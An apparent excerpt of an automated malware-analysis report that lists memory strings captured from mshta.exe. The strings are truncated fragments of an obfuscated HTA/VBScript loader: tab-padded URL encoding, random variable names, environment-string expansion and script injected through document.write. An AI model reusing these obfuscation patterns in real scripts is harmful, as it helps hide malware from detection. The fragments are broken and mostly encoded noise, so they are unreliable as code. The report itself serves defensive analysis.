%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%3A%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09SEt%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09rpMednImblCFitFebjpTswefbCzRkkqnFhgfsngwHSeycsHURcNpFgFPlfxgVsaJIXWhVJDaszXIiXhDqjIHoQreUylkyjXJnrkdaKysWNhfNpHzmmcSHJQtQpRZjRHIkYWPYxvWiqKLhCIftUVRZTEdPnruqyGamCkmbgUeQRHtFTMQAOpyECiDEZMphnwijIZpzRxoKXbauvuZwCnJMSeoZifHYr%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09
                    Source: mshta.exe, 0000000F.00000003.461361960.0000000003B69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 0:SEtrpMednImblCFitFebjpTswefbCzRkkqnFhgfsngwHSeycsHURcNpFgFPlfxgVsaJIXWhVJDaszXIiXhDqjIHoQreUylkyjXJnrkdaKysWNhfNpHzmmcSHJQtQpRZjRHIkYWPYxvWiqKLhCIftUVRZTEdPnruqyGamCkmbgUeQRHtFTMQAOpyECiDEZMphnwijIZpzRxoKXbauvuZwCnJMSeoZifHYr=nothinG
                    Source: mshta.exe, 00000003.00000003.417221996.000000000014E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.417290381.000000000014F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.416939084.000000000014B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.416901521.000000000014B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.416962919.000000000014B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.417181878.000000000014B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509rpMednImblCFitFebjpTswefbCzRkkqnFhgfsngwHSeycsHURcNpFgFPlfxgVsaJIXWhVJDaszXIiXhDqjIHoQreUylkyjXJnrkdaKysWNhfNpHzmmcSHJQtQpRZjRHIkYWPYxvWiqKLhCIftUVRZTEdPnruqyGamCkmbgUeQRHtFTMQAOpyECiDEZMphnwijIZpzRxoKXbauvuZwCnJMSeoZifHYr%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25253D%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509
                    Source: mshta.exe, 00000003.00000003.412256965.00000000001AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.412234342.00000000001AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: clOsE%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09rpMednImblCFitFebjpTswefbCzRkkqnFhgfsngwHSeycsHURcNpFgFPlfxgVsaJIXWhVJDaszXIiXhDqjIHoQreUylkyjXJnrkdaKysWNhfNpHzmmcSHJQtQpRZjRHIkYWPYxvWiqKLhCIftUVRZTEdPnruqyGamCkmbgUeQRHtFTMQAOpyECiDEZMphnwijIZpzRxoKXbauvuZwCnJMSeoZifHYr%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09!
                    Source: mshta.exe, 0000000F.00000003.464500007.000000000050D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.465579064.0000000000510000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.464786372.000000000050E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.464576777.000000000050D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509rpMednImblCFitFebjpTswefbCzRkkqnFhgfsngwHSeycsHURcNpFgFPlfxgVsaJIXWhVJDaszXIiXhDqjIHoQreUylkyjXJnrkdaKysWNhfNpHzmmcSHJQtQpRZjRHIkYWPYxvWiqKLhCIftUVRZTEdPnruqyGamCkmbgUeQRHtFTMQAOpyECiDEZMphnwijIZpzRxoKXbauvuZwCnJMSeoZifHYr%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%253D%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2
                    Source: mshta.exe, 0000000F.00000003.457118573.0000000004CD9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :SEtrpMednImblCFitFebjpTswefbCzRkkqnFhgfsngwHSeycsHURcNpFgFPlfxgVsaJIXWhVJDaszXIiXhDqjIHoQreUylkyjXJnrkdaKysWNhfNpHzmmcSHJQtQpRZjRHIkYWPYxvWiqKLhCIftUVRZTEdPnruqyGamCkmbgUeQRHtFTMQAOpyECiDEZMphnwijIZpzRxoKXbauvuZwCnJMSeoZifHYr=nothinG
                    Source: mshta.exe, 0000000F.00000003.461351634.0000000003B37000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 0:SEtrpMednImblCFitFebjpTswefbCzRkkqnFhgfsngwHSeycsHURcNpFgFPlfxgVsaJIXWhVJDaszXIiXhDqjIHoQreUylkyjXJnrkdaKysWNhfNpHzmmcSHJQtQpRZjRHIkYWPYxvWiqKLhCIftUVRZTEdPnruqyGamCkmbgUeQRHtFTMQAOpyECiDEZMphnwijIZpzRxoKXbauvuZwCnJMSeoZifHYr=nothinG
                    Source: mshta.exe, 00000003.00000003.415503022.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.412462864.0000000004BD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: KaIfUUMUNRDDxRBgPcvjLohfZHFlsFQBKctxCTWVYEpJupuYdWNlwJilYKzujbTxSScdFWgjFpqfFjjmnnZSDgrjHWeMPrzTLQAHdZEUjuwAgujfVyTOgBVjBMiUlxXYQsAQZXFjnovDYTKMDWjGiNjqiDAAzoEVISSmtLxlrtcVjAZoNdMcJOwPeOUmHKFRPMpEpjwiZegkOlsTZpoLMwXMRQeNLH&ChR(34),0:
                    Source: mshta.exe, 0000000F.00000003.464500007.000000000050D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.465579064.0000000000510000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.464786372.000000000050E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.464576777.000000000050D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%29%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%26%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09rpMednImblCFitFebjpTswefbCzRkkqnFhgfsngwHSeycsHURcNpFgFPlfxgVsaJIXWhVJDaszXIiXhDqjIHoQreUylkyjXJnrkdaKysWNhfNpHzmmcSHJQtQpRZjRHIkYWPYxvWiqKLhCIftUVRZTEdPnruqyGamCkmbgUeQRHtFTMQAOpyECiDEZMphnwijIZpzRxoKXbauvuZwCnJMSeoZifHYr.eXpandenviRonMEntsTRINgs%28%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%0
                    Source: mshta.exe, 00000003.00000003.415540284.0000000003959000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.414249570.0000000003948000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.417476267.0000000003959000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 52509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509rpMednImblCFitFebjpTswefbCzRkkqnFhgfsngwHSeycsHURcNpFgFPlfxgVsaJIXWhVJDaszXIiXhDqjIHoQreUylkyjXJnrkdaKysWNhfNpHzmmcSHJQtQpRZjRHIkYWPYxvWiqKLhCIftUVRZTEdPnruqyGamCkmbgUeQRHtFTMQAOpyECiDEZMphnwijIZpzRxoKXbauvuZwCnJMSeoZifHYr%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%
                    Source: mshta.exe, 0000000F.00000003.455691881.000000000056D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.455662548.000000000056A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rpMednImblCFitFebjpTswefbCzRkkqnFhgfsngwHSeycsHURcNpFgFPlfxgVsaJIXWhVJDaszXIiXhDqjIHoQreUylkyjXJnrkdaKysWNhfNpHzmmcSHJQtQpRZjRHIkYWPYxvWiqKLhCIftUVRZTEdPnruqyGamCkmbgUeQRHtFTMQAOpyECiDEZMphnwijIZpzRxoKXbauvuZwCnJMSeoZifHYr@M
                    Source: mshta.exe, 00000003.00000003.417151695.0000000004A08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.415829099.0000000004A07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cument.write(unescape("%3Cscript%20language%3DJavaScript%3Em%3D%27%253C%2521DOCTYPE%2520html%253E%250A%253Cmeta%2520http-equiv%253D%2522X-UA-Compatible%2522%2520content%253D%2522IE%253DEmulateIE8%2522%2520%253E%250A%253Chtml%253E%250A%253Cbody%253E%250A%253CSCrIPT%2520TYPe%253D%2522TeXT/vBsCRiPT%2522%253E%250ADim%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509rpMednImblCFitFebjpTswefbCzRkkqnFhgfsngwHSeycsHURcNpFgFPlfxgVsaJIXWhVJDaszXIiXhDqjIHoQreUylkyjXJnrkdaKysWNhfNpHzmmcSHJQtQpRZjR
                    Source: mshta.exe, 00000003.00000003.417221996.000000000014E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.417290381.000000000014F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.416939084.000000000014B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.416901521.000000000014B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.416962919.000000000014B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.417181878.000000000014B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%3A%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09seT%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%0